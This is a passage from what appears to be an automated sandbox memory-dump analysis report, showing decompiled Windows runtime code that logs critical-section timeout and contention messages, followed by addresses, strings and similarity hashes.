				_t15 = _t12;
				_t7 = E0368CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E036D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E036D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                      0x036dfdda
                      0x036dfde2
                      0x036dfde5
                      0x036dfdec
                      0x036dfdfa
                      0x036dfdff
                      0x036dfe0a
                      0x036dfe0f
                      0x036dfe17
                      0x036dfe1e
                      0x036dfe19
                      0x036dfe19
                      0x036dfe19
                      0x036dfe20
                      0x036dfe21
                      0x036dfe22
                      0x036dfe25
                      0x036dfe40

                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036DFDFA
                      Strings
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036DFE2B
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036DFE01
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp Download File
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp Download File
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                      • API String ID: 885266447-3903918235
                      • Opcode ID: 0c7d6900978d9ddd9992aca90c2056f77d1f6b08d8761b475d8a049ad6a841a8
                      • Instruction ID: cad5f33eb506f47c93c81bfb7618b1df99580c0ef988bca2aeba21d54ce70f63
                      • Opcode Fuzzy Hash: 0c7d6900978d9ddd9992aca90c2056f77d1f6b08d8761b475d8a049ad6a841a8
                      • Instruction Fuzzy Hash: 8EF0F676A00201BFD6309B45DC06F23BB6AEB45B30F244318F6285A5D1DA62F82086F4
                      Uniqueness

                      Uniqueness Score: -1.00%